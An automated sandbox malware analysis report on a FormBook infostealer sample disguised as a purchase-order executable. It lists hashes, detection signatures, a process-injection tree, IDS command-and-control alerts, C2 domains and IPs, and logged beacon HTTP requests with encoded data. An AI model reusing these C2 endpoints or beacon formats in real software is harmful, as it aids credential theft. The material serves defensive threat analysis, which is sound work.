Windows Analysis Report
Hire P.O.exe

Overview

General Information

Sample name: Hire P.O.exe
Analysis ID: 1556306
MD5: 838e3079ecea7cbf8d6909abe0d6f393
SHA1: 0dbddc8f8935d4c464d77e418bee2ff61624d7e1
SHA256: 7e88c41f8c326c85f54f8df37579e2b846bb34fc821cc14e99c0bf43c4a8fd8a
Tags: exe, user-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Hire P.O.exe (PID: 7872 cmdline: "C:\Users\user\Desktop\Hire P.O.exe" MD5: 838E3079ECEA7CBF8D6909ABE0D6F393)
    • Hire P.O.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\Hire P.O.exe" MD5: 838E3079ECEA7CBF8D6909ABE0D6F393)
      • zKwhguHavy.exe (PID: 2076 cmdline: "C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 4812 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • zKwhguHavy.exe (PID: 3732 cmdline: "C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1212 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.Hire P.O.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.Hire P.O.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-15T09:32:00.628951+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49981 | 85.159.66.93 | 80 | TCP
2024-11-15T09:32:24.347747+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49985 | 91.184.0.200 | 80 | TCP
2024-11-15T09:32:38.015857+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49989 | 194.9.94.86 | 80 | TCP
2024-11-15T09:32:51.741328+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49993 | 170.39.213.43 | 80 | TCP
2024-11-15T09:33:05.157377+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49997 | 13.248.169.48 | 80 | TCP
2024-11-15T09:33:19.457187+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50001 | 38.47.232.194 | 80 | TCP
2024-11-15T09:33:32.980413+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50005 | 167.172.133.32 | 80 | TCP
2024-11-15T09:33:46.389247+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50009 | 162.0.211.143 | 80 | TCP

                AV Detection

                Source: Hire P.O.exe | Avira: detected
                Source: Hire P.O.exe | ReversingLabs: Detection: 57%
                Source: Yara match | File source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Hire P.O.exe | Joe Sandbox ML: detected
                Source: Hire P.O.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Hire P.O.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: fc.pdb source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdbSHA2568 source: Hire P.O.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zKwhguHavy.exe, 00000006.00000002.3139218530.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941529168.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdb source: Hire P.O.exe
                Source: Binary string: wntdll.pdb source: Hire P.O.exe, Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 7_2_0050C500 FindFirstFileW,FindNextFileW,FindClose | 7_2_0050C500
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 4x nop then xor eax, eax | 7_2_004F9D00
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 4x nop then mov ebx, 00000004h | 7_2_02C904DE

                Networking

                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50005 -> 167.172.133.32:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49985 -> 91.184.0.200:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49997 -> 13.248.169.48:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50001 -> 38.47.232.194:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49993 -> 170.39.213.43:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49981 -> 85.159.66.93:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49989 -> 194.9.94.86:80
                Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50009 -> 162.0.211.143:80
                Source: DNS query: www.tesetturhanzade.xyz
                Source: Joe Sandbox View | IP Address: 194.9.94.86
                Source: Joe Sandbox View | IP Address: 13.248.169.48
                Source: Joe Sandbox View | ASN Name: LOOPIASE
                Source: Joe Sandbox View | ASN Name: HOSTNETNL
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ur0f/?Ht=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiOLfy4lE5d8KH961FjyGPsNNV+mrO2nqMYXA=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.tesetturhanzade.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ggvc/?VRvXS=WfxxDba8X&Ht=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1sK6ZXv4UHMlnEy7R+vzIZHc2JfvRSKbgShg= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.kantinestoel.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /57zf/?Ht=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi6ITFfezPRUw2CIw7GC9Ov+fkwE2kIiBG9Hg=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.deeplungatlas.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ultrawin23.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ew98/?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.sonoscan.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /45n6/?VRvXS=WfxxDba8X&Ht=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYylWN2xRdIuk3ZdTLMRFf+/Hm0bLjKb/7io/E= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.zz67x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jlqg/?Ht=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1snIy3rHn2YPrXd4E8Hi4h+GYhtHJoWRtIl2c=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.omnibizlux.bizConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /4xim/?Ht=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP2+eiOObBwEQMzrW97hoYkmxyo0/quMuclnrI=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.vibixx.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global traffic | DNS traffic detected: DNS query: www.tangible.online
                Source: global traffic | DNS traffic detected: DNS query: www.tesetturhanzade.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.kantinestoel.online
                Source: global traffic | DNS traffic detected: DNS query: www.deeplungatlas.org
                Source: global traffic | DNS traffic detected: DNS query: www.ultrawin23.shop
                Source: global traffic | DNS traffic detected: DNS query: www.sonoscan.org
                Source: global traffic | DNS traffic detected: DNS query: www.zz67x.top
                Source: global traffic | DNS traffic detected: DNS query: www.omnibizlux.biz
                Source: global traffic | DNS traffic detected: DNS query: www.vibixx.site
                Source: unknown | HTTP traffic detected: POST /ggvc/ HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate, br | Host: www.kantinestoel.online | Origin: http://www.kantinestoel.online | Cache-Control: no-cache | Connection: close | Content-Length: 199 | Content-Type: application/x-www-form-urlencoded | Referer: http://www.kantinestoel.online/ggvc/ | User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Fri, 15 Nov 2024 08:32:00 GMT | Content-Length: 0 | Connection: close | X-Rate-Limit-Limit: 5s | X-Rate-Limit-Remaining: 19 | X-Rate-Limit-Reset: 2024-11-15T08:32:05.4402834Z
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:32:16 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:32:19 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:32:21 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:32:24 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 15 Nov 2024 08:33:11 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 15 Nov 2024 08:33:14 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 15 Nov 2024 08:33:16 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 15 Nov 2024 08:33:19 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Fri, 15 Nov 2024 08:33:25 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Fri, 15 Nov 2024 08:33:27 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Fri, 15 Nov 2024 08:33:30 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Fri, 15 Nov 2024 08:33:32 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:33:38 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:33:41 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:33:43 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 15 Nov 2024 08:33:46 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8

                E-Banking Fraud

                Source: Yara match | File source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116D5B05_2_0116D5B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118F43F5_2_0118F43F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C14605_2_010C1460
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118F7B05_2_0118F7B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011816CC5_2_011816CC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011659105_2_01165910
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D99505_2_010D9950
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EB9505_2_010EB950
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113D8005_2_0113D800
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D38E05_2_010D38E0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FB765_2_0118FB76
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EFB805_2_010EFB80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01145BF05_2_01145BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110DBF95_2_0110DBF9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FA495_2_0118FA49
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01187A465_2_01187A46
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01143A6C5_2_01143A6C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01115AA05_2_01115AA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116DAAC5_2_0116DAAC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0117DAC65_2_0117DAC6
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01181D5A5_2_01181D5A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D3D405_2_010D3D40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01187D735_2_01187D73
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EFDC05_2_010EFDC0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01149C325_2_01149C32
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FCF25_2_0118FCF2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FF095_2_0118FF09
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D1F925_2_010D1F92
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FFB15_2_0118FFB1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D9EB05_2_010D9EB0
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273235A6_2_0273235A
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273235E6_2_0273235E
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272B9EE6_2_0272B9EE
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027201EF6_2_027201EF
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0274A7BE6_2_0274A7BE
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272BC0E6_2_0272BC0E
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02729C8E6_2_02729C8E
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E502C07_2_02E502C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E702747_2_02E70274
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E903E67_2_02E903E6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDE3F07_2_02DDE3F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8A3527_2_02E8A352
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E620007_2_02E62000
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E881CC7_2_02E881CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E901AA7_2_02E901AA
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E581587_2_02E58158
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC01007_2_02DC0100
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6A1187_2_02E6A118
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEC6E07_2_02DEC6E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DCC7C07_2_02DCC7C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DF47507_2_02DF4750
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD07707_2_02DD0770
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E7E4F67_2_02E7E4F6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E824467_2_02E82446
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E744207_2_02E74420
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E905917_2_02E90591
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD05357_2_02DD0535
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DCEA807_2_02DCEA80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E86BD77_2_02E86BD7
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8AB407_2_02E8AB40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DFE8F07_2_02DFE8F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DB68B87_2_02DB68B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDA8407_2_02DDA840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD28407_2_02DD2840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E9A9A67_2_02E9A9A6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD29A07_2_02DD29A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DE69627_2_02DE6962
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8EEDB7_2_02E8EEDB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DE2E907_2_02DE2E90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8CE937_2_02E8CE93
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD0E597_2_02DD0E59
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8EE267_2_02E8EE26
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC2FC87_2_02DC2FC8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDCFE07_2_02DDCFE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E4EFA07_2_02E4EFA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E44F407_2_02E44F40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E12F287_2_02E12F28
